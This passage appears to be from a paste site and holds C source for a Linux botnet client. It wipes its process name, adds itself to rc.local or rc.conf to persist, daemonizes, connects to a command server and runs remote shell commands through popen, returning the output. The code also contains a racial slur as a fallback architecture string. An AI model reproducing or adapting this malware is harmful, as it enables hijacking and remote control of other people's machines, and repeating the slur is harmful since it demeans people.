  2096. #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
  2097. return "ARM-4";
  2098. #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
  2099. return "ARM-5"
  2100. #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
  2101. return "ARM-6";
  2102. #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
  2103. return "MIPS";
  2104. #elif defined(__sh__)
  2105. return "SUPERH";
  2106. #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
  2107. return "POWERPC";
  2108. #else
  2109. return "NIGGER";
  2110. #endif
  2111. }
  2112. int main(int argc, unsigned char *argv[]) {
  2113. char *mynameis = "";
  2114. if(SERVER_LIST_SIZE <= 0) return 0;
  2115. strncpy(argv[0],"",strlen(argv[0]));
  2116. argv[0] = "";
  2117. prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
  2118. srand(time(NULL) ^ getpid());
  2119. init_rand(time(NULL) ^ getpid());
  2120. pid_t pid1;
  2121. pid_t pid2;
  2122. int status;
  2123. int dupthing = 0;
  2124. char cwd[256],*str;
  2125. FILE *file;
  2126. str="/etc/rc.d/rc.local";
  2127. file=fopen(str,"r");
  2128. if (file == NULL) {
  2129. str="/etc/rc.conf";
  2130. file=fopen(str,"r");
  2131. }
  2132. if (file != NULL) {
  2133. char outfile[256], buf[1024];
  2134. int i=strlen(argv[0]), d=0;
  2135. getcwd(cwd,256);
  2136. if (strcmp(cwd,"/")) {
  2137. while(argv[0][i] != '/') i--;
  2138. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  2139. while(!feof(file)) {
  2140. fgets(buf,1024,file);
  2141. if (!strcasecmp(buf,outfile)) d++;
  2142. }
  2143. if (d == 0) {
  2144. FILE *out;
  2145. fclose(file);
  2146. out=fopen(str,"a");
  2147. if (out != NULL) {
  2148. fputs(outfile,out);
  2149. fclose(out);
  2150. }
  2151. }
  2152. else fclose(file);
  2153. }
  2154. else fclose(file);
  2155. }
  2156. getOurIP();
  2157. if (pid1 = fork()) {
  2158. waitpid(pid1, &status, 0);
  2159. exit(0);
  2160. } else if (!pid1) {
  2161. if (pid2 = fork()) {
  2162. exit(0);
  2163. } else if (!pid2) {
  2164. } else {
  2165. zprintf("fork failed\n");
  2166. }
  2167. } else {
  2168. zprintf("fork failed\n");
  2169. }
  2170. setsid();
  2171. chdir("/");
  2172. signal(SIGPIPE, SIG_IGN);
  2173. while(1)
  2174. {
  2175. if(initConnection()) { sleep(30); continue; }
  2176. Heliosprintf(HeliosCommSock, "\x1b[1;36m Sex\x1b[1;31m Demon Connected!!:%s Arch:%s\x1b[34m", inet_ntoa(ourIP), getBuild());
  2177. char commBuf[4096];
  2178. int got = 0;
  2179. int i = 0;
  2180. while((got = recvLine(HeliosCommSock, commBuf, 4096)) != -1) {
  2181. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
  2182. unsigned int *newpids, on;
  2183. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
  2184. pids[on - 1] = 0;
  2185. numpids--;
  2186. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
  2187. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
  2188. free(pids);
  2189. pids = newpids;
  2190. }
  2191. commBuf[got] = 0x00;
  2192. trim(commBuf);
  2193. if(strstr(commBuf, "PING") == commBuf) {
  2194. #ifdef PRINTS_ENABLED
  2195. Heliosprintf(HeliosCommSock, "PONG");
  2196. #endif
  2197. continue;
  2198. }
  2199. if(strstr(commBuf, "LELIMDUP") == commBuf){
  2200. dupthing++;
  2201. zprintf("PEACE OUT IMMA DUP\n");
  2202. if(dupthing > 20){
  2203. exit(0);
  2204. }
  2205. break;
  2206. }
  2207. unsigned char *message = commBuf;
  2208. if(*message == '!') {
  2209. unsigned char *nickMask = message + 1;
  2210. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
  2211. if(*nickMask == 0x00) continue;
  2212. *(nickMask) = 0x00;
  2213. nickMask = message + 1;
  2214. message = message + strlen(nickMask) + 2;
  2215. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
  2216. unsigned char *command = message;
  2217. while(*message != ' ' && *message != 0x00) message++;
  2218. *message = 0x00;
  2219. message++;
  2220. unsigned char *tmpcommand = command;
  2221. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
  2222. if(strcmp(command, "STOLENBOTS") == 0) {
  2223. unsigned char buf[1024];
  2224. int command;
  2225. if (listFork()) continue;
  2226. memset(buf, 0, 1024);
  2227. szprintf(buf, "%s 2>&1", message);
  2228. command = fdpopen(buf, "r");
  2229. while(fdgets(buf, 1024, command) != NULL) {
  2230. trim(buf);
  2231. #ifdef PRINTS_ENABLED
  2232. Heliosprintf(HeliosCommSock, "%s", buf);
  2233. #endif
  2234. memset(buf, 0, 1024);
  2235. sleep(1);
  2236. }
  2237. fdpclose(command);
  2238. exit(0);
  2239. }
  2240. unsigned char *params[10];
  2241. int paramsCount = 1;
  2242. unsigned char *pch = strtok(message, " ");
  2243. params[0] = command;
  2244. while(pch) {
  2245. if(*pch != '\n') {
  2246. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
  2247. memset(params[paramsCount], 0, strlen(pch) + 1);
  2248. strcpy(params[paramsCount], pch);
  2249. paramsCount++;
  2250. }
  2251. pch = strtok(NULL, " ");
  2252. }
  2253. processCmd(paramsCount, params);
  2254. if(paramsCount > 1) {
  2255. int q = 1;
  2256. for(q = 1; q < paramsCount; q++) {
  2257. free(params[q]);
  2258. }
  2259. }
  2260. }
  2261. }
  2262. }
  2263. return 0;
  2264. printf("client exiting");
  2265. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement